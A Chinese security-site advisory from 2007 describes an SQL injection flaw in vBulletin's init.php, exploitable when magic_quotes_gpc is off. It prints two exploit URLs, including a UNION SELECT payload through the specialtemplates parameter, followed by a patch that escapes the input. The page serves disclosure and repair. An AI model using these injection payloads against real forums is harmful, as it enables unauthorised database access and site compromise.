vBulletin init.php sql注射漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页

vBulletin init.php sql注射漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-25 10:39:56

漏洞概要:vBulletin是一款用Php写成的广泛使用的论坛程序。其中一个很重要的特色就是允许管理员动态的修改面板的样式。
如果Php的"magic_quotes_gpc"开关是关闭的话，vBulletin's init.php 存在一个sql注射漏洞。
漏洞提供:al3ndaleeb
漏洞细节:
漏洞利用:
http://site/forum/global.php?specialtemplates=al3ndaleeb')
http://site/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb') UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*
漏洞修补:
打开init.php文件寻找如下代码
$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplates) . "')
");
unset($specials, $specialtemplates);
替换成
if(!is_array($specialtemplates))
exit;

$specialtemplate = array();
foreach ($specialtemplates AS $arrykey => $arryval)
{
$specialtemplate[] = addslashes($specialtemplates["$arrykey"]);
}

$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplate) . "')
");
unset($specials, $specialtemplates, $specialtemplate);

【转自世纪安全网 http://www.21safe.com】

文章录入：admin 责任编辑：admin

上一篇文章： PHPWIND1.3.6论坛漏洞分析

下一篇文章： Jacks FormMail.php远程文件浏览漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

phpBB User Viewed Post
补天IISWall防火墙V2.1
MP（MultiPPP）：多重链
asp.net 出现Critical E
动网论坛(DVBBS 7.1.0 S
Dvbbs插件 z_fy_lookdis
修正400余个bug PHP迎来
PHPFreeNews searchresu
VBScript 运行时错误的
PHPWind v3.0.1 Beta 版

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
Copyright © 2006-2008　www.anquan365.com　安全365 建议使用1024*768分辨率及第三方浏览器对本站进行浏览